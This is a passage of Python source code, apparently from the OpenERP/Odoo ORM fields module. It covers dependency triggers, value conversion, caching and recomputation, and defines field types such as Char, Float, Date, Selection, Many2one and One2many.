                other = other[name][:1]
            record[self.name] = other[self.related[-1]]

    def _inverse_related(self, records):
        """ Inverse the related field ``self`` on ``records``. """
        # store record values, otherwise they may be lost by cache invalidation!
        record_value = {record: record[self.name] for record in records}
        for record in records:
            other = record
            # traverse the intermediate fields, and keep at most one record
            for name in self.related[:-1]:
                other = other[name][:1]
            if other:
                other[self.related[-1]] = record_value[record]

    def _search_related(self, records, operator, value):
        """ Determine the domain to search on field ``self``. """
        return [('.'.join(self.related), operator, value)]

    # properties used by _setup_related() to copy values from related field
    _related_comodel_name = property(attrgetter('comodel_name'))
    _related_string = property(attrgetter('string'))
    _related_help = property(attrgetter('help'))
    _related_readonly = property(attrgetter('readonly'))
    _related_groups = property(attrgetter('groups'))

    @property
    def base_field(self):
        """ Return the base field of an inherited field, or ``self``. """
        return self.related_field.base_field if self.inherited else self

    #
    # Setup of field triggers
    #
    # The triggers is a collection of pairs (field, path) of computed fields
    # that depend on ``self``. When ``self`` is modified, it invalidates the cache
    # of each ``field``, and registers the records to recompute based on ``path``.
    # See method ``modified`` below for details.
    #

    def add_trigger(self, trigger):
        """ Add a recomputation trigger on ``self``. """
        if trigger not in self._triggers:
            self._triggers += (trigger,)

    def setup_triggers(self, env):
        """ Add the necessary triggers to invalidate/recompute ``self``. """
        model = env[self.model_name]
        for path in self.depends:
            self._setup_dependency([], model, path.split('.'))

    def _setup_dependency(self, path0, model, path1):
        """ Make ``self`` depend on ``model``; `path0 + path1` is a dependency of
            ``self``, and ``path0`` is the sequence of field names from ``self.model``
            to ``model``.
        """
        env = model.env
        head, tail = path1[0], path1[1:]

        if head == '*':
            # special case: add triggers on all fields of model (except self)
            fields = set(model._fields.itervalues()) - set([self])
        else:
            fields = [model._fields[head]]

        for field in fields:
            if field == self:
                _logger.debug("Field %s is recursively defined", self)
                self.recursive = True
                continue

            #_logger.debug("Add trigger on %s to recompute %s", field, self)
            field.add_trigger((self, '.'.join(path0 or ['id'])))

            # add trigger on inverse fields, too
            for invf in field.inverse_fields:
                #_logger.debug("Add trigger on %s to recompute %s", invf, self)
                invf.add_trigger((self, '.'.join(path0 + [head])))

            # recursively traverse the dependency
            if tail:
                comodel = env[field.comodel_name]
                self._setup_dependency(path0 + [head], comodel, tail)

    @property
    def dependents(self):
        """ Return the computed fields that depend on ``self``. """
        return (field for field, path in self._triggers)

    ############################################################################
    #
    # Field description
    #

    def get_description(self, env):
        """ Return a dictionary that describes the field ``self``. """
        desc = {'type': self.type}
        for attr, prop in self.description_attrs:
            value = getattr(self, prop)
            if callable(value):
                value = value(env)
            if value is not None:
                desc[attr] = value

        return desc

    # properties used by get_description()
    _description_store = property(attrgetter('store'))
    _description_manual = property(attrgetter('manual'))
    _description_depends = property(attrgetter('depends'))
    _description_related = property(attrgetter('related'))
    _description_company_dependent = property(attrgetter('company_dependent'))
    _description_readonly = property(attrgetter('readonly'))
    _description_required = property(attrgetter('required'))
    _description_states = property(attrgetter('states'))
    _description_groups = property(attrgetter('groups'))
    _description_change_default = property(attrgetter('change_default'))
    _description_deprecated = property(attrgetter('deprecated'))

    @property
    def _description_searchable(self):
        return bool(self.store or self.search or (self.column and self.column._fnct_search))

    @property
    def _description_sortable(self):
        return self.store or (self.inherited and self.related_field._description_sortable)

    def _description_string(self, env):
        if self.string and env.lang:
            field = self.base_field
            name = "%s,%s" % (field.model_name, field.name)
            trans = env['ir.translation']._get_source(name, 'field', env.lang)
            return trans or self.string
        return self.string

    def _description_help(self, env):
        if self.help and env.lang:
            name = "%s,%s" % (self.model_name, self.name)
            trans = env['ir.translation']._get_source(name, 'help', env.lang)
            return trans or self.help
        return self.help

    ############################################################################
    #
    # Conversion to column instance
    #

    def to_column(self):
        """ Return a column object corresponding to ``self``, or ``None``. """
        if not self.store and self.compute:
            # non-stored computed fields do not have a corresponding column
            self.column = None
            return None

        # determine column parameters
        #_logger.debug("Create fields._column for Field %s", self)
        args = {}
        for attr, prop in self.column_attrs:
            args[attr] = getattr(self, prop)
        for attr, value in self._attrs.iteritems():
            args[attr] = value

        if self.company_dependent:
            # company-dependent fields are mapped to former property fields
            args['type'] = self.type
            args['relation'] = self.comodel_name
            self.column = fields.property(**args)
        elif self.column:
            # let the column provide a valid column for the given parameters
            self.column = self.column.new(_computed_field=bool(self.compute), **args)
        else:
            # create a fresh new column of the right type
            self.column = getattr(fields, self.type)(**args)

        return self.column

    # properties used by to_column() to create a column instance
    _column_copy = property(attrgetter('copy'))
    _column_select = property(attrgetter('index'))
    _column_manual = property(attrgetter('manual'))
    _column_string = property(attrgetter('string'))
    _column_help = property(attrgetter('help'))
    _column_readonly = property(attrgetter('readonly'))
    _column_required = property(attrgetter('required'))
    _column_states = property(attrgetter('states'))
    _column_groups = property(attrgetter('groups'))
    _column_change_default = property(attrgetter('change_default'))
    _column_deprecated = property(attrgetter('deprecated'))

    ############################################################################
    #
    # Conversion of values
    #

    def null(self, env):
        """ return the null value for this field in the given environment """
        return False

    def convert_to_cache(self, value, record, validate=True):
        """ convert ``value`` to the cache level in ``env``; ``value`` may come from
            an assignment, or have the format of methods :meth:`BaseModel.read`
            or :meth:`BaseModel.write`

            :param record: the target record for the assignment, or an empty recordset

            :param bool validate: when True, field-specific validation of
                ``value`` will be performed
        """
        return value

    def convert_to_read(self, value, use_name_get=True):
        """ convert ``value`` from the cache to a value as returned by method
            :meth:`BaseModel.read`

            :param bool use_name_get: when True, value's diplay name will
                be computed using :meth:`BaseModel.name_get`, if relevant
                for the field
        """
        return False if value is None else value

    def convert_to_write(self, value, target=None, fnames=None):
        """ convert ``value`` from the cache to a valid value for method
            :meth:`BaseModel.write`.

            :param target: optional, the record to be modified with this value
            :param fnames: for relational fields only, an optional collection of
                field names to convert
        """
        return self.convert_to_read(value)

    def convert_to_onchange(self, value):
        """ convert ``value`` from the cache to a valid value for an onchange
            method v7.
        """
        return self.convert_to_write(value)

    def convert_to_export(self, value, env):
        """ convert ``value`` from the cache to a valid value for export. The
            parameter ``env`` is given for managing translations.
        """
        if not value:
            return ''
        return value if env.context.get('export_raw_data') else ustr(value)

    def convert_to_display_name(self, value, record=None):
        """ convert ``value`` from the cache to a suitable display name. """
        return ustr(value)

    ############################################################################
    #
    # Descriptor methods
    #

    def __get__(self, record, owner):
        """ return the value of field ``self`` on ``record`` """
        if record is None:
            return self         # the field is accessed through the owner class

        if not record:
            # null record -> return the null value for this field
            return self.null(record.env)

        # only a single record may be accessed
        record.ensure_one()

        try:
            return record._cache[self]
        except KeyError:
            pass

        # cache miss, retrieve value
        if record.id:
            # normal record -> read or compute value for this field
            self.determine_value(record)
        else:
            # draft record -> compute the value or let it be null
            self.determine_draft_value(record)

        # the result should be in cache now
        return record._cache[self]

    def __set__(self, record, value):
        """ set the value of field ``self`` on ``record`` """
        env = record.env

        # only a single record may be updated
        record.ensure_one()

        # adapt value to the cache level
        value = self.convert_to_cache(value, record)

        if env.in_draft or not record.id:
            # determine dependent fields
            spec = self.modified_draft(record)

            # set value in cache, inverse field, and mark record as dirty
            record._cache[self] = value
            if env.in_onchange:
                for invf in self.inverse_fields:
                    invf._update(value, record)
                record._set_dirty(self.name)

            # determine more dependent fields, and invalidate them
            if self.relational:
                spec += self.modified_draft(record)
            env.invalidate(spec)

        else:
            # simply write to the database, and update cache
            record.write({self.name: self.convert_to_write(value)})
            record._cache[self] = value

    ############################################################################
    #
    # Computation of field values
    #

    def _compute_value(self, records):
        """ Invoke the compute method on ``records``. """
        # initialize the fields to their corresponding null value in cache
        for field in self.computed_fields:
            records._cache[field] = field.null(records.env)
            records.env.computed[field].update(records._ids)
        self.compute(records)
        for field in self.computed_fields:
            records.env.computed[field].difference_update(records._ids)

    def compute_value(self, records):
        """ Invoke the compute method on ``records``; the results are in cache. """
        with records.env.do_in_draft():
            try:
                self._compute_value(records)
            except (AccessError, MissingError):
                # some record is forbidden or missing, retry record by record
                for record in records:
                    try:
                        self._compute_value(record)
                    except Exception as exc:
                        record._cache[self.name] = FailedValue(exc)

    def determine_value(self, record):
        """ Determine the value of ``self`` for ``record``. """
        env = record.env

        if self.column and not (self.depends and env.in_draft):
            # this is a stored field or an old-style function field
            if self.depends:
                # this is a stored computed field, check for recomputation
                recs = record._recompute_check(self)
                if recs:
                    # recompute the value (only in cache)
                    self.compute_value(recs)
                    # HACK: if result is in the wrong cache, copy values
                    if recs.env != env:
                        for source, target in zip(recs, recs.with_env(env)):
                            try:
                                values = target._convert_to_cache({
                                    f.name: source[f.name] for f in self.computed_fields
                                }, validate=False)
                            except MissingError as e:
                                values = FailedValue(e)
                            target._cache.update(values)
                    # the result is saved to database by BaseModel.recompute()
                    return

            # read the field from database
            record._prefetch_field(self)

        elif self.compute:
            # this is either a non-stored computed field, or a stored computed
            # field in draft mode
            if self.recursive:
                self.compute_value(record)
            else:
                recs = record._in_cache_without(self)
                self.compute_value(recs)

        else:
            # this is a non-stored non-computed field
            record._cache[self] = self.null(env)

    def determine_draft_value(self, record):
        """ Determine the value of ``self`` for the given draft ``record``. """
        if self.compute:
            self._compute_value(record)
        else:
            record._cache[self] = SpecialValue(self.null(record.env))

    def determine_inverse(self, records):
        """ Given the value of ``self`` on ``records``, inverse the computation. """
        if self.inverse:
            self.inverse(records)

    def determine_domain(self, records, operator, value):
        """ Return a domain representing a condition on ``self``. """
        if self.search:
            return self.search(records, operator, value)
        else:
            return [(self.name, operator, value)]

    ############################################################################
    #
    # Notification when fields are modified
    #

    def modified(self, records):
        """ Notify that field ``self`` has been modified on ``records``: prepare the
            fields/records to recompute, and return a spec indicating what to
            invalidate.
        """
        # invalidate the fields that depend on self, and prepare recomputation
        spec = [(self, records._ids)]
        for field, path in self._triggers:
            if path and field.store:
                # don't move this line to function top, see log
                env = records.env(user=SUPERUSER_ID, context={'active_test': False})
                target = env[field.model_name].search([(path, 'in', records.ids)])
                if target:
                    spec.append((field, target._ids))
                    # recompute field on target in the environment of records,
                    # and as user admin if required
                    if field.compute_sudo:
                        target = target.with_env(records.env(user=SUPERUSER_ID))
                    else:
                        target = target.with_env(records.env)
                    target._recompute_todo(field)
            else:
                spec.append((field, None))

        return spec

    def modified_draft(self, records):
        """ Same as :meth:`modified`, but in draft mode. """
        env = records.env

        # invalidate the fields on the records in cache that depend on
        # ``records``, except fields currently being computed
        spec = []
        for field, path in self._triggers:
            target = env[field.model_name]
            computed = target.browse(env.computed[field])
            if path == 'id':
                target = records - computed
            elif path:
                target = (target.browse(env.cache[field]) - computed).filtered(
                    lambda rec: rec._mapped_cache(path) & records
                )
            else:
                target = target.browse(env.cache[field]) - computed

            if target:
                spec.append((field, target._ids))

        return spec


class Boolean(Field):
    type = 'boolean'

    def convert_to_cache(self, value, record, validate=True):
        return bool(value)

    def convert_to_export(self, value, env):
        if env.context.get('export_raw_data'):
            return value
        return ustr(value)


class Integer(Field):
    type = 'integer'
    _slots = {
        'group_operator': None,         # operator for aggregating values
        'group_expression': None,       # advance expression for aggregating values
    }

    _related_group_operator = property(attrgetter('group_operator'))
    _column_group_operator = property(attrgetter('group_operator'))
    _related_group_expression = property(attrgetter('group_expression'))
    _column_group_expression = property(attrgetter('group_expression'))

    def convert_to_cache(self, value, record, validate=True):
        if isinstance(value, dict):
            # special case, when an integer field is used as inverse for a one2many
            return value.get('id', False)
        return int(value or 0)

    def convert_to_read(self, value, use_name_get=True):
        # Integer values greater than 2^31-1 are not supported in pure XMLRPC,
        # so we have to pass them as floats :-(
        if value and value > xmlrpclib.MAXINT:
            return float(value)
        return value

    def _update(self, records, value):
        # special case, when an integer field is used as inverse for a one2many
        records._cache[self] = value.id or 0

    def convert_to_export(self, value, env):
        if value or value == 0:
            return value if env.context.get('export_raw_data') else ustr(value)
        return ''


class Float(Field):
    """ The precision digits are given by the attribute

    :param digits: a pair (total, decimal), or a function taking a database
                   cursor and returning a pair (total, decimal)
    """
    type = 'float'
    _slots = {
        '_digits': None,                # digits argument passed to class initializer
        'group_operator': None,         # operator for aggregating values
        'group_expression': None,       # advance expression for aggregating values
    }

    def __init__(self, string=None, digits=None, **kwargs):
        super(Float, self).__init__(string=string, _digits=digits, **kwargs)

    @property
    def digits(self):
        if callable(self._digits):
            with fields._get_cursor() as cr:
                return self._digits(cr)
        else:
            return self._digits

    def _setup_digits(self, env):
        """ Setup the digits for ``self`` and its corresponding column """
        pass

    def _setup_regular(self, env):
        super(Float, self)._setup_regular(env)
        self._setup_digits(env)

    _related__digits = property(attrgetter('_digits'))
    _related_group_operator = property(attrgetter('group_operator'))
    _related_group_expression = property(attrgetter('group_expression'))

    _description_digits = property(attrgetter('digits'))

    _column_digits = property(lambda self: not callable(self._digits) and self._digits)
    _column_digits_compute = property(lambda self: callable(self._digits) and self._digits)
    _column_group_operator = property(attrgetter('group_operator'))
    _column_group_expression = property(attrgetter('group_expression'))

    def convert_to_cache(self, value, record, validate=True):
        # apply rounding here, otherwise value in cache may be wrong!
        value = float(value or 0.0)
        digits = self.digits
        return float_round(value, precision_digits=digits[1]) if digits else value

    def convert_to_export(self, value, env):
        if value or value == 0.0:
            return value if env.context.get('export_raw_data') else ustr(value)
        return ''


class _String(Field):
    """ Abstract class for string fields. """
    _slots = {
        'translate': False,             # whether the field is translated
    }

    _column_translate = property(attrgetter('translate'))
    _related_translate = property(attrgetter('translate'))
    _description_translate = property(attrgetter('translate'))
    

class Char(_String):
    """ Basic string field, can be length-limited, usually displayed as a
    single-line string in clients

    :param int size: the maximum size of values stored for that field
    :param bool translate: whether the values of this field can be translated
    """
    type = 'char'
    _slots = {
        'size': None,                   # maximum size of values (deprecated)
    }

    _column_size = property(attrgetter('size'))
    _related_size = property(attrgetter('size'))
    _description_size = property(attrgetter('size'))

    def _setup_regular(self, env):
        super(Char, self)._setup_regular(env)
        assert isinstance(self.size, (NoneType, int)), \
            "Char field %s with non-integer size %r" % (self, self.size)

    def convert_to_cache(self, value, record, validate=True):
        if value is None or value is False:
            return False
        return ustr(value)[:self.size]

class Text(_String):
    """ Very similar to :class:`~.Char` but used for longer contents, does not
    have a size and usually displayed as a multiline text box.

    :param translate: whether the value of this field can be translated
    """
    type = 'text'

    def convert_to_cache(self, value, record, validate=True):
        if value is None or value is False:
            return False
        return ustr(value)

class Html(_String):
    type = 'html'
    _slots = {
        'sanitize': True,               # whether value must be sanitized
        'strip_style': False,           # whether to strip style attributes
    }

    _column_sanitize = property(attrgetter('sanitize'))
    _related_sanitize = property(attrgetter('sanitize'))
    _description_sanitize = property(attrgetter('sanitize'))

    _column_strip_style = property(attrgetter('strip_style'))
    _related_strip_style = property(attrgetter('strip_style'))
    _description_strip_style = property(attrgetter('strip_style'))

    def convert_to_cache(self, value, record, validate=True):
        if value is None or value is False:
            return False
        if validate and self.sanitize:
            return html_sanitize(value, strip_style=self.strip_style)
        return value


class Date(Field):
    type = 'date'

    @staticmethod
    def today(*args):
        """ Return the current day in the format expected by the ORM.
            This function may be used to compute default values.
        """
        return date.today().strftime(DATE_FORMAT)

    @staticmethod
    def context_today(record, timestamp=None):
        """ Return the current date as seen in the client's timezone in a format
            fit for date fields. This method may be used to compute default
            values.

            :param datetime timestamp: optional datetime value to use instead of
                the current date and time (must be a datetime, regular dates
                can't be converted between timezones.)
            :rtype: str
        """
        today = timestamp or datetime.now()
        context_today = None
        tz_name = record._context.get('tz') or record.env.user.tz
        if tz_name:
            try:
                today_utc = pytz.timezone('UTC').localize(today, is_dst=False)  # UTC = no DST
                context_today = today_utc.astimezone(pytz.timezone(tz_name))
            except Exception:
                _logger.debug("failed to compute context/client-specific today date, using UTC value for `today`",
                              exc_info=True)
        return (context_today or today).strftime(DATE_FORMAT)

    @staticmethod
    def from_string(value):
        """ Convert an ORM ``value`` into a :class:`date` value. """
        if not value:
            return None
        value = value[:DATE_LENGTH]
        return datetime.strptime(value, DATE_FORMAT).date()

    @staticmethod
    def to_string(value):
        """ Convert a :class:`date` value into the format expected by the ORM. """
        return value.strftime(DATE_FORMAT) if value else False

    def convert_to_cache(self, value, record, validate=True):
        if not value:
            return False
        if isinstance(value, basestring):
            if validate:
                # force parsing for validation
                self.from_string(value)
            return value[:DATE_LENGTH]
        return self.to_string(value)

    def convert_to_export(self, value, env):
        if not value:
            return ''
        return self.from_string(value) if env.context.get('export_raw_data') else ustr(value)


class Datetime(Field):
    type = 'datetime'

    @staticmethod
    def now(*args):
        """ Return the current day and time in the format expected by the ORM.
            This function may be used to compute default values.
        """
        return datetime.now().strftime(DATETIME_FORMAT)

    @staticmethod
    def context_timestamp(record, timestamp):
        """Returns the given timestamp converted to the client's timezone.
           This method is *not* meant for use as a _defaults initializer,
           because datetime fields are automatically converted upon
           display on client side. For _defaults you :meth:`fields.datetime.now`
           should be used instead.

           :param datetime timestamp: naive datetime value (expressed in UTC)
                                      to be converted to the client timezone
           :rtype: datetime
           :return: timestamp converted to timezone-aware datetime in context
                    timezone
        """
        assert isinstance(timestamp, datetime), 'Datetime instance expected'
        tz_name = record._context.get('tz') or record.env.user.tz
        utc_timestamp = pytz.utc.localize(timestamp, is_dst=False)  # UTC = no DST
        if tz_name:
            try:
                context_tz = pytz.timezone(tz_name)
                return utc_timestamp.astimezone(context_tz)
            except Exception:
                _logger.debug("failed to compute context/client-specific timestamp, "
                              "using the UTC value",
                              exc_info=True)
        return utc_timestamp

    @staticmethod
    def from_string(value):
        """ Convert an ORM ``value`` into a :class:`datetime` value. """
        if not value:
            return None
        value = value[:DATETIME_LENGTH]
        if len(value) == DATE_LENGTH:
            value += " 00:00:00"
        return datetime.strptime(value, DATETIME_FORMAT)

    @staticmethod
    def to_string(value):
        """ Convert a :class:`datetime` value into the format expected by the ORM. """
        return value.strftime(DATETIME_FORMAT) if value else False

    def convert_to_cache(self, value, record, validate=True):
        if not value:
            return False
        if isinstance(value, basestring):
            if validate:
                # force parsing for validation
                self.from_string(value)
            value = value[:DATETIME_LENGTH]
            if len(value) == DATE_LENGTH:
                value += " 00:00:00"
            return value
        return self.to_string(value)

    def convert_to_export(self, value, env):
        if not value:
            return ''
        return self.from_string(value) if env.context.get('export_raw_data') else ustr(value)

    def convert_to_display_name(self, value, record=None):
        assert record, 'Record expected'
        return Datetime.to_string(Datetime.context_timestamp(record, Datetime.from_string(value)))


class Binary(Field):
    type = 'binary'


class Selection(Field):
    """
    :param selection: specifies the possible values for this field.
        It is given as either a list of pairs (``value``, ``string``), or a
        model method, or a method name.
    :param selection_add: provides an extension of the selection in the case
        of an overridden field. It is a list of pairs (``value``, ``string``).

    The attribute ``selection`` is mandatory except in the case of
    :ref:`related fields <field-related>` or :ref:`field extensions
    <field-incremental-definition>`.
    """
    type = 'selection'
    _slots = {
        'selection': None,              # [(value, string), ...], function or method name
    }

    def __init__(self, selection=None, string=None, **kwargs):
        if callable(selection):
            from openerp import api
            selection = api.expected(api.model, selection)
        super(Selection, self).__init__(selection=selection, string=string, **kwargs)

    def _setup_regular(self, env):
        super(Selection, self)._setup_regular(env)
        assert self.selection is not None, "Field %s without selection" % self

    def _setup_related(self, env):
        super(Selection, self)._setup_related(env)
        # selection must be computed on related field
        field = self.related_field
        self.selection = lambda model: field._description_selection(model.env)

    def set_class_name(self, cls, name):
        super(Selection, self).set_class_name(cls, name)
        # determine selection (applying 'selection_add' extensions)
        for field in resolve_all_mro(cls, name, reverse=True):
            if isinstance(field, type(self)):
                # We cannot use field.selection or field.selection_add here
                # because those attributes are overridden by ``set_class_name``.
                if 'selection' in field._attrs:
                    self.selection = field._attrs['selection']
                if 'selection_add' in field._attrs:
                    # use an OrderedDict to update existing values
                    selection_add = field._attrs['selection_add']
                    self.selection = OrderedDict(self.selection + selection_add).items()
            else:
                self.selection = None

    def _description_selection(self, env):
        """ return the selection list (pairs (value, label)); labels are
            translated according to context language
        """
        selection = self.selection
        if isinstance(selection, basestring):
            return getattr(env[self.model_name], selection)()
        if callable(selection):
            return selection(env[self.model_name])

        # translate selection labels
        if env.lang:
            name = "%s,%s" % (self.model_name, self.name)
            translate = partial(
                env['ir.translation']._get_source, name, 'selection', env.lang)
            return [(value, translate(label) if label else label) for value, label in selection]
        else:
            return selection

    @property
    def _column_selection(self):
        if isinstance(self.selection, basestring):
            method = self.selection
            return lambda self, *a, **kw: getattr(self, method)(*a, **kw)
        else:
            return self.selection

    def get_values(self, env):
        """ return a list of the possible values """
        selection = self.selection
        if isinstance(selection, basestring):
            selection = getattr(env[self.model_name], selection)()
        elif callable(selection):
            selection = selection(env[self.model_name])
        return [value for value, _ in selection]

    def convert_to_cache(self, value, record, validate=True):
        if not validate:
            return value or False
        if value in self.get_values(record.env):
            return value
        elif not value:
            return False
        raise ValueError("Wrong value for %s: %r" % (self, value))

    def convert_to_export(self, value, env):
        if not isinstance(self.selection, list):
            # FIXME: this reproduces an existing buggy behavior!
            return value if value else ''
        for item in self._description_selection(env):
            if item[0] == value:
                return item[1]
        return False


class Reference(Selection):
    type = 'reference'
    _slots = {
        'size': None,                   # maximum size of values (deprecated)
    }

    _related_size = property(attrgetter('size'))
    _column_size = property(attrgetter('size'))

    def _setup_regular(self, env):
        super(Reference, self)._setup_regular(env)
        assert isinstance(self.size, (NoneType, int)), \
            "Reference field %s with non-integer size %r" % (self, self.size)

    def convert_to_cache(self, value, record, validate=True):
        if isinstance(value, BaseModel):
            if ((not validate or value._name in self.get_values(record.env))
                    and len(value) <= 1):
                return value.with_env(record.env) or False
        elif isinstance(value, basestring):
            res_model, res_id = value.split(',')
            return record.env[res_model].browse(int(res_id))
        elif not value:
            return False
        raise ValueError("Wrong value for %s: %r" % (self, value))

    def convert_to_read(self, value, use_name_get=True):
        return "%s,%s" % (value._name, value.id) if value else False

    def convert_to_export(self, value, env):
        return value.name_get()[0][1] if value else ''

    def convert_to_display_name(self, value, record=None):
        return ustr(value and value.display_name)


class _Relational(Field):
    """ Abstract class for relational fields. """
    relational = True
    _slots = {
        'domain': [],                   # domain for searching values
        'context': {},                  # context for searching values
    }

    def _setup_regular(self, env):
        super(_Relational, self)._setup_regular(env)
        if self.comodel_name not in env.registry:
            _logger.warning("Field %s with unknown comodel_name %r"
                            % (self, self.comodel_name))
            self.comodel_name = '_unknown'

    @property
    def _related_domain(self):
        if callable(self.domain):
            # will be called with another model than self's
            return lambda recs: self.domain(recs.env[self.model_name])
        else:
            # maybe not correct if domain is a string...
            return self.domain

    _related_context = property(attrgetter('context'))

    _description_relation = property(attrgetter('comodel_name'))
    _description_context = property(attrgetter('context'))

    def _description_domain(self, env):
        return self.domain(env[self.model_name]) if callable(self.domain) else self.domain

    _column_obj = property(attrgetter('comodel_name'))
    _column_domain = property(attrgetter('domain'))
    _column_context = property(attrgetter('context'))

    def null(self, env):
        return env[self.comodel_name]

    def modified(self, records):
        # Invalidate cache for self.inverse_fields, too. Note that recomputation
        # of fields that depend on self.inverse_fields is already covered by the
        # triggers (see above).
        spec = super(_Relational, self).modified(records)
        for invf in self.inverse_fields:
            spec.append((invf, None))
        return spec


class Many2one(_Relational):
    """ The value of such a field is a recordset of size 0 (no
    record) or 1 (a single record).

    :param comodel_name: name of the target model (string)

    :param domain: an optional domain to set on candidate values on the
        client side (domain or string)

    :param context: an optional context to use on the client side when
        handling that field (dictionary)

    :param ondelete: what to do when the referred record is deleted;
        possible values are: ``'set null'``, ``'restrict'``, ``'cascade'``

    :param auto_join: whether JOINs are generated upon search through that
        field (boolean, by default ``False``)

    :param delegate: set it to ``True`` to make fields of the target model
        accessible from the current model (corresponds to ``_inherits``)

    The attribute ``comodel_name`` is mandatory except in the case of related
    fields or field extensions.
    """
    type = 'many2one'
    _slots = {
        'ondelete': 'set null',         # what to do when value is deleted
        'auto_join': False,             # whether joins are generated upon search
        'delegate': False,              # whether self implements delegation
    }

    def __init__(self, comodel_name=None, string=None, **kwargs):
        super(Many2one, self).__init__(comodel_name=comodel_name, string=string, **kwargs)

    def set_class_name(self, cls, name):
        super(Many2one, self).set_class_name(cls, name)
        # determine self.delegate
        if not self.delegate:
            self.delegate = name in cls._inherits.values()

    _column_ondelete = property(attrgetter('ondelete'))
    _column_auto_join = property(attrgetter('auto_join'))

    def _update(self, records, value):
        """ Update the cached value of ``self`` for ``records`` with ``value``. """
        records._cache[self] = value

    def convert_to_cache(self, value, record, validate=True):
        if isinstance(value, (NoneType, int, long)):
            return record.env[self.comodel_name].browse(value)
        if isinstance(value, BaseModel):
            if value._name == self.comodel_name and len(value) <= 1:
                return value.with_env(record.env)
            raise ValueError("Wrong value for %s: %r" % (self, value))
        elif isinstance(value, tuple):
            return record.env[self.comodel_name].browse(value[0])
        elif isinstance(value, dict):
            return record.env[self.comodel_name].new(value)
        else:
            return self.null(record.env)

    def convert_to_read(self, value, use_name_get=True):
        if use_name_get and value:
            # evaluate name_get() as superuser, because the visibility of a
            # many2one field value (id and name) depends on the current record's
            # access rights, and not the value's access rights.
            try:
                value_sudo = value.sudo()
                # performance trick: make sure that all records of the same
                # model as value in value.env will be prefetched in value_sudo.env
                value_sudo.env.prefetch[value._name].update(value.env.prefetch[value._name])
                return value_sudo.name_get()[0]
            except MissingError:
                # Should not happen, unless the foreign key is missing.
                return False
        else:
            return value.id

    def convert_to_write(self, value, target=None, fnames=None):
        return value.id

    def convert_to_onchange(self, value):
        return value.id

    def convert_to_export(self, value, env):
        return value.name_get()[0][1] if value else ''

    def convert_to_display_name(self, value, record=None):
        return ustr(value.display_name)


class UnionUpdate(SpecialValue):
    """ Placeholder for a value update; when this value is taken from the cache,
        it returns ``record[field.name] | value`` and stores it in the cache.
    """
    def __init__(self, field, record, value):
        self.args = (field, record, value)

    def get(self):
        field, record, value = self.args
        # in order to read the current field's value, remove self from cache
        del record._cache[field]
        # read the current field's value, and update it in cache only
        record._cache[field] = new_value = record[field.name] | value
        return new_value


class _RelationalMulti(_Relational):
    """ Abstract class for relational fields *2many. """

    def _update(self, records, value):
        """ Update the cached value of ``self`` for ``records`` with ``value``. """
        for record in records:
            if self in record._cache:
                record._cache[self] = record[self.name] | value
            else:
                record._cache[self] = UnionUpdate(self, record, value)

    def convert_to_cache(self, value, record, validate=True):
        if isinstance(value, BaseModel):
            if value._name == self.comodel_name:
                return value.with_env(record.env)
        elif isinstance(value, list):
            # value is a list of record ids or commands
            comodel = record.env[self.comodel_name]
            ids = OrderedSet(record[self.name].ids)
            # modify ids with the commands
            for command in value:
                if isinstance(command, (tuple, list)):
                    if command[0] == 0:
                        ids.add(comodel.new(command[2]).id)
                    elif command[0] == 1:
                        comodel.browse(command[1]).update(command[2])
                        ids.add(command[1])
                    elif command[0] == 2:
                        # note: the record will be deleted by write()
                        ids.discard(command[1])
                    elif command[0] == 3:
                        ids.discard(command[1])
                    elif command[0] == 4:
                        ids.add(command[1])
                    elif command[0] == 5:
                        ids.clear()
                    elif command[0] == 6:
                        ids = OrderedSet(command[2])
                elif isinstance(command, dict):
                    ids.add(comodel.new(command).id)
                else:
                    ids.add(command)
            # return result as a recordset
            return comodel.browse(list(ids))
        elif not value:
            return self.null(record.env)
        raise ValueError("Wrong value for %s: %s" % (self, value))

    def convert_to_read(self, value, use_name_get=True):
        return value.ids

    def convert_to_write(self, value, target=None, fnames=None):
        # remove/delete former records
        if target is None:
            set_ids = []
            result = [(6, 0, set_ids)]
            add_existing = lambda id: set_ids.append(id)
        else:
            tag = 2 if self.type == 'one2many' else 3
            result = [(tag, record.id) for record in target[self.name] - value]
            add_existing = lambda id: result.append((4, id))

        if fnames is None:
            # take all fields in cache, except the inverses of self
            fnames = set(value._fields) - set(MAGIC_COLUMNS)
            for invf in self.inverse_fields:
                fnames.discard(invf.name)

        # add new and existing records
        for record in value:
            if not record.id:
                values = {k: v for k, v in record._cache.iteritems() if k in fnames}
                values = record._convert_to_write(values)
                result.append((0, 0, values))
            elif record._is_dirty():
                values = {k: record._cache[k] for k in record._get_dirty() if k in fnames}
                values = record._convert_to_write(values)
                result.append((1, record.id, values))
            else:
                add_existing(record.id)

        return result

    def convert_to_export(self, value, env):
        return ','.join(name for id, name in value.name_get()) if value else ''

    def convert_to_display_name(self, value, record=None):
        raise NotImplementedError()

    def _compute_related(self, records):
        """ Compute the related field ``self`` on ``records``. """
        for record in records:
            value = record
            # traverse the intermediate fields, and keep at most one record
            for name in self.related[:-1]:
                value = value[name][:1]
            record[self.name] = value[self.related[-1]]


class One2many(_RelationalMulti):
    """ One2many field; the value of such a field is the recordset of all the
        records in ``comodel_name`` such that the field ``inverse_name`` is equal to
        the current record.

        :param comodel_name: name of the target model (string)

        :param inverse_name: name of the inverse ``Many2one`` field in
            ``comodel_name`` (string)

        :param domain: an optional domain to set on candidate values on the
            client side (domain or string)

        :param context: an optional context to use on the client side when
            handling that field (dictionary)

        :param auto_join: whether JOINs are generated upon search through that
            field (boolean, by default ``False``)

        :param limit: optional limit to use upon read (integer)

        The attributes ``comodel_name`` and ``inverse_name`` are mandatory except in
        the case of related fields or field extensions.
    """
    type = 'one2many'
    _slots = {
        'inverse_name': None,           # name of the inverse field
        'auto_join': False,             # whether joins are generated upon search
        'limit': None,                  # optional limit to use upon read
        'copy': False,                  # o2m are not copied by default
    }

    def __init__(self, comodel_name=None, inverse_name=None, string=None, **kwargs):
        super(One2many, self).__init__(
            comodel_name=comodel_name,
            inverse_name=inverse_name,
            string=string,
            **kwargs
        )

    def _setup_regular(self, env):
        super(One2many, self)._setup_regular(env)

        if self.inverse_name:
            # link self to its inverse field and vice-versa
            comodel = env[self.comodel_name]
            invf = comodel._fields[self.inverse_name]
            # In some rare cases, a ``One2many`` field can link to ``Int`` field
            # (res_model/res_id pattern). Only inverse the field if this is
            # a ``Many2one`` field.
            if isinstance(invf, Many2one):
                self.inverse_fields += (invf,)
                invf.inverse_fields += (self,)

    _description_relation_field = property(attrgetter('inverse_name'))

    _column_fields_id = property(attrgetter('inverse_name'))
